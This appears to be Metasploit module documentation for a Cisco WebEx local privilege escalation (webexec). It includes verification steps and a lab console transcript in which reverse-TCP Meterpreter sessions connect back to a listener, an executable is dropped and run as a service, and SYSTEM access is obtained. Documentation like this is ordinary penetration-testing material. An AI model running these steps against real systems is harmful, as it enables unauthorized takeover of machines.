2.0 KiB
2.0 KiB
Description
This module gets an elevated session with System privileges by exploiting a remote code execution vulnerability found in Cisco's WebEx client software for versions below v33.6.0.655.
Vulnerable Application
Cisco WebEx v33.3.8.7 and below
Verification Steps
- Install the application
- Start msfconsole
- Get a session
- Do:
use exploit/windows/local/webexec - Do:
set SESSION <session> - Do:
run - You should get an elevated session.
Scenarios
Tested on Cisco WebEx v33.3.8.7 on Windows 7 x64 and x86
msf5 > use multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Sending stage (179779 bytes) to 192.168.37.136
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.136:49161) at 2018-10-24 09:41:47 -0500
meterpreter > getuid
Server username: WIN-MGMN7ND70I1\a_user
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/windows/local/webexec
msf5 exploit(windows/local/webexec) > set session 1
session => 1
msf5 exploit(windows/local/webexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/webexec) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(windows/local/webexec) > run
[*] Started reverse TCP handler on 192.168.37.1:4444
[*] Checking service exists...
[*] Writing 73802 bytes to %SystemRoot%\Temp\Ak4U78kG.exe...
[*] Launching service...
[*] Sending stage (179779 bytes) to 192.168.37.136
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.136:49162) at 2018-10-24 09:42:35 -0500
[*] Service started...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >